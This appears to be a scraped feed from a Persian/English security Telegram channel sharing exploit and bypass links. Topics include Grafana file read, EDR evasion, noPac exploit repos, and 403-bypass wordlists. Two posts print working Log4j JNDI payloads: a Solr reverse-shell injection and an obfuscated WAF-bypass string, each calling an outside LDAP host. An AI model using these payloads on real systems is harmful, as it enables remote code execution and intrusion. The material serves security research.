⭕️ Grafana unauthorized arbitrary file read.
#infosec #cybersecuritytips #GRAFANA #bugbounty
@securation
#infosec #cybersecuritytips #GRAFANA #bugbounty
@securation
⭕️ Bypassing ETW-Based Solutions
https://www.binarly.io/posts/Design_issues_of_modern_EDRs_bypassing_ETW-based_solutions/index.html
#etw #redteam #blueteam #malware #edr
@securation
https://www.binarly.io/posts/Design_issues_of_modern_EDRs_bypassing_ETW-based_solutions/index.html
#etw #redteam #blueteam #malware #edr
@securation
⭕️ Ransomware and Vulnerability Management - Download FREE preview and check the articles!
https://hakin9.org/download/ransomware-and-vulnerability-management-preview/
#infosec #cybersecurity #redteam #pentest #pentesting #hacking #hackers #coding
@securation
https://hakin9.org/download/ransomware-and-vulnerability-management-preview/
#infosec #cybersecurity #redteam #pentest #pentesting #hacking #hackers #coding
@securation
Hakin9 - IT Security Magazine
Ransomware and Vulnerability Management preview - Hakin9 - IT Security Magazine
We decided to dedicate our June edition to a very current and recurring topic - Ransomware and Vulnerability Management. During the COVID pandemic, the ransomware industry was more powerful than ever. That’s why it’s so crucial to understand how ransomware…
👍1
whitepaper.pdf
770.8 KB
⭕️این #whitepaper مربوط به اکسپلویت شدن اوبونتو هست که توی مسابقات pwn2own انجام شد و هنوز روی نسخه Ubuntu Desktop 20.10 هم جواب میده با وجود اینکه آپدیت هم اومده واسش.
پ ن : همه مسابقات اوبونتو رو میارن وسط انگار ویندوز XP sp1 اکسپلویت میکنند :)
#ubuntu #linux #kernelexp #binexp
@securation
پ ن : همه مسابقات اوبونتو رو میارن وسط انگار ویندوز XP sp1 اکسپلویت میکنند :)
#ubuntu #linux #kernelexp #binexp
@securation
👍1
⭕️ آسیب پذیری جدید روی Log4j اومده بود که با شماره CVE-2021-44228 ثبت شده هنوز خیلی جاها آسیب پذیر هستند.
شما میتونید با استفاده از اسکریپتی که به Template اسکنر Nuclei اضافه شده تارگت های مورد نظر رو بررسی کنید.
منابع :
https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
#bugbounty #pentest #Log4j #security
@securation
شما میتونید با استفاده از اسکریپتی که به Template اسکنر Nuclei اضافه شده تارگت های مورد نظر رو بررسی کنید.
منابع :
https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
#bugbounty #pentest #Log4j #security
@securation
apache solr EXP #log4j
/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&wt=json
#log4j #apache #exploit
@securation
⭕️CVE-2021-42287 / CVE-2021-42278: impersonate DA from standard domain user
Scanner and exploit in C # :
https://github.com/cube0x0/noPac
Python exploit for kali :
https://github.com/WazeHell/sam-the-admin
#exploit #git #pentest #redteam
@securation
Scanner and exploit in C # :
https://github.com/cube0x0/noPac
Python exploit for kali :
https://github.com/WazeHell/sam-the-admin
#exploit #git #pentest #redteam
@securation
GitHub
GitHub - cube0x0/noPac: CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter.
CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter. - cube0x0/noPac
⭕️ Previous AWS WAF bypass is patched.. here is another:
@securation
${jnd${123%25ff:-${123%25ff:-i:}}ldap://mydogsbutt.com:1389/o}
#jndi #log4j #exploit #bypass@securation
⭕️ مجموعه ای از wordlists و دستوراتی برای FFUF و template هایی برای nuclei که در بایپس ارور های 403 بکار برده میشه رو اینجا میتونید استفاده کنید.
https://github.com/aufzayed/bugbounty/tree/main/403-bypass
#bugbounty #cybersecurity #infosec #wordlists #403bypass #hack #ffuf #fuzzing #web
@securation
https://github.com/aufzayed/bugbounty/tree/main/403-bypass
#bugbounty #cybersecurity #infosec #wordlists #403bypass #hack #ffuf #fuzzing #web
@securation
GitHub
bugbounty/403-bypass at main · aufzayed/bugbounty
Bugbounty Resources. Contribute to aufzayed/bugbounty development by creating an account on GitHub.
👍1